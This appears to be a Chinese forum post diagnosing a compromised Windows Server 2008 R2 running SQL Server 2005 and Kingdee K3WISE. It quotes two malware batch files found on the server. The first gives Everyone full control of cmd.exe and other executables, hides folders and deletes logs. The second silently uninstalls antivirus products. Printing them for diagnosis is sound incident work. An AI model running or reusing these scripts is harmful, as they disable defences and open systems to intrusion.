环境:
windows server 2008 r2
sql server 2005
症状:
1、金蝶K3WISE客户端无法登录服务器。用SA登录SQL SERVER 管理工具失败,修改SA密码后,重启SA登录再失败。
2、通过机器名或Ip无法访问服务器的共享文件,但可以Ping通不丢包。客户端间的共享打印机正常访问。
3、服务器上桌面任务栏总显示网络未连接,但是可以上网,打开网络适配器也是正常的。
4、打系统补丁无效,同时发现组策略打开时有报错现象。
5、由于服务器数据和应用较多,没有直接重装,而是采用升级的方法,还好兼容性问题不大。升级成功后,启动提示找不到123.bat。(注册表RUN下,升级后文件位于C:\Windows.old\Windows\SysWOW64\wbem\123.bat中)
附件:
1、123.bat内容
@echo off
mode con: cols=13 lines=1
md C:\Progra~1\shengda
md C:\Progra~1\kugou2010
md C:\download
regsvr32 /s shell32.dll
regsvr32 /s WSHom.Ocx
regsvr32 /s scrrun.dll
regsvr32 /s c:\Progra~1\Common~1\System\Ado\Msado15.dll
regsvr32 /s jscript.dll
regsvr32 /s vbscript.dll
attrib +s +h C:\Progra~1\shengda
attrib +s +h C:\Progra~1\kugou2010
attrib +s +h C:\download
cacls cmd.exe /e /g system:f
cacls cmd.exe /e /g everyone:f
cacls ftp.exe /e /g system:f
cacls ftp.exe /e /g everyone:f
cacls c:\windows\help\akpls.exe /e /g system:f
cacls c:\windows\help\akpls.exe /e /g everyone:f
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g system:f
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g everyone:f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v shell /f
cacls c:\windows\help\*.exe /e /g system:f
cacls c:\windows\debug\*.exe /e /g system:f
cacls c:\windows\system\*.exe /e /g system:f
del c:\windows\system32\wbem\se.bat
del c:\windows\system32\wbem\12345.bat
del c:\windows\system32\wbem\123456.bat
del c:\windows\system32\wbem\1234.bat
del c:\windows\system32\*.log
exit
又发现如下文件 c:\windows\system\backs.bat:
wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
cmd /c "C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart
exit